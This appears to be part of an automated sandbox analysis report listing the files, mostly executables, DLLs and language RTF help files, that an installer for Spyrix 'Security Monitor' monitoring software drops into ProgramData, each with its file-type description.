C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-0USI1.tmp
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-2D6JG.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3UVHQ.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-5RI0Q.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A237A.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-AHV7G.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-AJOVR.tmp
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BDDH1.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CC63N.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ESRQU.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-FUVBN.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H0VIM.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HGCLM.tmp
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-I5RH2.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ISTUF.tmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-J5DND.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF9SV.tmp
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-M06NF.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NE9RG.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NIDOR.tmp
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OQK9A.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-SE2BH.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T1Q7P.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T6149.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-UVC43.tmp
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-2H716.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3QCNE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-68BJ6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9GNLO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9TPU5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9VDM7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-BA9LB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-BBQLO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-G0KKP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-IFC14.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-KDVH2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-LH6K4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PIKCP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-SFIBL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-T1N6N.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-T6FS0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-V9N24.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-03BEV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-1K1NO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-48PRA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-7E52I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-7MSDN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-81LEV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-8Q5FL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-8U7RP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-IF3SM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-JEGPV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-KBQLB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-NFUO7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-R7IQ8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-S3KE3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-TT07B.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-UBGMU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-UHK7A.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0B59J.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1TMUB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-2G1NE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-4N4S2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-70E45.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-8B9O1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-98KDV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D2U4H.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-DR3T8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-E85N2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-ESSPP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-FS18O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-GUSFS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-H96RC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-IA9OG.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-J4NCC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-KGCB5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M3HK4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M9AVQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-MI82S.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-NI3R1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-PU13U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-R9EQA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SJSEG.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-U1D7G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
